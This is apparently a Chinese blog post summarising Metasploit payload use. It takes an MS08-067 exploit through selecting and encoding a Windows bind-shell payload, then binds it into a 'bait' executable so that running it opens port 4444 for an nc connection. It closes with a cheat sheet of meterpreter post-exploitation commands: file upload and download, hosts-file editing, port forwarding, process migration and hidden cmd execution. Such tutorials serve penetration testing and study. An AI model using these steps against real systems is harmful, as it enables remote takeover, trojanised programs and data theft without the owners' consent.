【Metasploit总结】之【payload】

本文介绍在发现漏洞后如何选择和使用payload,包括典型payload的选择、编码以避免“坏字符”的出现,以及如何生成定制payload。此外还介绍了meterpreter的基本命令和一些常用的文件系统、网络及系统命令。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

payload

发现漏洞后,如何选择payload。

典型payload

  • 使用exploit
msf6 > use exploit/windows/smb/ms08_067_netapi
  • 查看当前漏洞可利用payload
msf6 exploit(windows/smb/ms08_067_netapi) > show payloads
  • 查看payload信息
msf6 exploit(windows/smb/ms08_067_netapi) > info windows/shell/bind_tcp
  • 使用payload
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/bind_tcp

生成定制payload

  • 选择payload
msf6 exploit(windows/smb/ms08_067_netapi) > use windows/shell/bind_tcp
  • 编码
    避免“坏字符”。
    查看可使用编码方式:
msf6 payload(windows/shell/bind_tcp) > show encoders

尽量使用excellent的编码:

msf6 payload(windows/shell/bind_tcp) > generate -e cmd/powershell_base64 -i 2 -n 14 -o /root/Desktop/myPayload
# -e选择编码方式,-i编码次数,-o输出路径,-n增加14个“空命令”
# 也可以与一个exe查询绑定,当目标主机运行被绑定payload的程序后目标4444端口会被开放,可使用命令“nc <targetIP> 4444”连接:
msf6 payload(windows/shell_bind_tcp) > generate -e cmd/powershell_base64 -t exe -i 5 -k -x /root/Desktop/bait.exe -f /root/Desktop/bait_with_payload.exe

meterpreter payload

https://blog.csdn.net/qq_44874645/article/details/109544192

基本命令

background
# 保存会话,返回msfconsole

session
# 查看所有会话,进入会话:session -i <session id>

quit
# 关闭当前会话

shell
# 会话下使用,获取shell

文件系统命令

cat
# 查看文件内容

getwd
# 查看当前在目标的工作目录

upload nc.exe c:\
# 上传文件,-r上传目录

download c:\\nc.exe
# 下载文件,双斜杠需转移

edit c:\\windows\\system32\\drivers\\etc\\hosts
# 对文件进行编辑

search -d c:\\ -f *.mdb
# 搜索文件

网络命令

ipconfig

portwd add -l 1234 -p 3389 -r 192.168.1.131
# 端口转发,例:目标端口只允许内网访问3389,那么可用此条命令将其3389端口转发到本地,实现本地访目标3389端口
# -l本地端口发放,-r目标ip

route
# 路由信息

系统命令

ps
# 查看进程

migrate <pid>
# 将meterpreter会话转移到其它稳定进程,如explorer.exe

execute -H -i -f cmd.exe
# 在目标上隐藏执行cmd

getpid
# 获取当前meterpreter注入进程的pid

kill <pid>
# 结束指定进程

get uid
# 获得用户名,从而查看权限

sysinfo
# 系统信息

shutdown
# 关机
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值